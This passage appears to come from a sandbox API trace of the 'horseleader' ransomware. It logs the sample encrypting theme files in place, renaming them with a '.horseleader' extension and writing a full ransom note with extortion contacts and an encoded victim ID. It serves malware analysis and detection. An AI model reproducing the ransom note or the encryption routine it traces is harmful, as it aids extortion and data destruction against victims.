hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.446] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x116d5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.446] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.446] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.446] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.446] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.447] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.447] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.447] CloseHandle (hObject=0x1a4) returned 1 [0247.447] GetProcessHeap () returned 0x780000 [0247.447] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.447] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM.horseleader") returned 91 [0247.447] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\papyrus.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\papyrus.elm.horseleader")) returned 1 [0247.448] GetProcessHeap () returned 0x780000 [0247.448] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.448] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1f4, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PAPYRUS.INF", cAlternateFileName="")) returned 1 [0247.448] lstrcmpiW (lpString1="PAPYRUS.INF", lpString2="Windows") returned -1 [0247.448] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF") returned 79 [0247.449] StrStrIW (lpFirst="PAPYRUS.INF", lpSrch=".horseleader") returned 0x0 [0247.449] lstrcmpW (lpString1="PAPYRUS.INF", lpString2="#Decrypt#.txt") returned 1 [0247.449] lstrcmpW (lpString1="PAPYRUS.INF", lpString2="_uninstalling_.png") returned 1 [0247.449] lstrlenW (lpString=".testttjffg") returned 11 [0247.449] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF", lpSrch=".testttjffg") returned 0x0 [0247.449] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.449] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.449] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\papyrus.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.451] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF") returned 79 [0247.451] StrStrW (lpFirst="PAPYRUS.INF", lpSrch=".txt") returned 0x0 [0247.451] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=500) returned 1 [0247.451] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1f4, lpOverlapped=0x0) returned 1 [0247.453] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.453] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1f4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1f4, lpOverlapped=0x0) returned 1 [0247.453] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.453] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.453] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.453] CloseHandle (hObject=0x1a4) returned 1 [0247.454] GetProcessHeap () returned 0x780000 [0247.454] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.454] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF.horseleader") returned 91 [0247.454] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\papyrus.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\papyrus.inf.horseleader")) returned 1 [0247.458] GetProcessHeap () returned 0x780000 [0247.458] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.458] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xa0e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.458] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.458] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 79 [0247.458] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.458] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.458] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.458] lstrlenW (lpString=".testttjffg") returned 11 [0247.458] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.458] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.458] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.458] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.459] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 79 [0247.459] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.459] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2574) returned 1 [0247.459] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xa0e, lpOverlapped=0x0) returned 1 [0247.461] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff5f2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.462] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xa0e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xa0e, lpOverlapped=0x0) returned 1 [0247.462] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.462] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.462] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.462] CloseHandle (hObject=0x1a4) returned 1 [0247.462] GetProcessHeap () returned 0x780000 [0247.463] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.463] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.horseleader") returned 91 [0247.463] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\preview.gif.horseleader")) returned 1 [0247.464] GetProcessHeap () returned 0x780000 [0247.464] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.464] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x9240, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.464] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.464] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 80 [0247.464] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.464] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.464] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.464] lstrlenW (lpString=".testttjffg") returned 11 [0247.464] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.464] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.464] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.464] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.465] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 80 [0247.465] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.465] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=37440) returned 1 [0247.465] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.471] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.471] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.472] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4240, lpOverlapped=0x0) returned 1 [0247.472] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffbdc0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.472] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4240, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4240, lpOverlapped=0x0) returned 1 [0247.473] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.473] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.473] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.473] CloseHandle (hObject=0x1a4) returned 1 [0247.473] GetProcessHeap () returned 0x780000 [0247.473] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.473] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.horseleader") returned 92 [0247.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png.horseleader")) returned 1 [0247.474] GetProcessHeap () returned 0x780000 [0247.474] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.474] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x9240, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.475] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.475] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\#Decrypt#.txt") returned 81 [0247.475] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.479] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.479] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.480] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.480] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.480] CloseHandle (hObject=0x158) returned 1 [0247.481] GetProcessHeap () returned 0x780000 [0247.481] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.481] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a44b570, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="PIXEL", cAlternateFileName="")) returned 1 [0247.481] lstrcmpiW (lpString1="PIXEL", lpString2="Windows") returned -1 [0247.481] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL") returned 65 [0247.481] lstrcmpW (lpString1="PIXEL", lpString2=".") returned 1 [0247.481] lstrcmpW (lpString1="PIXEL", lpString2="..") returned 1 [0247.481] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.481] GetProcessHeap () returned 0x780000 [0247.481] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.481] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\*") returned 67 [0247.481] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a44b570, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.482] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.482] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\.") returned 67 [0247.482] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.482] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: 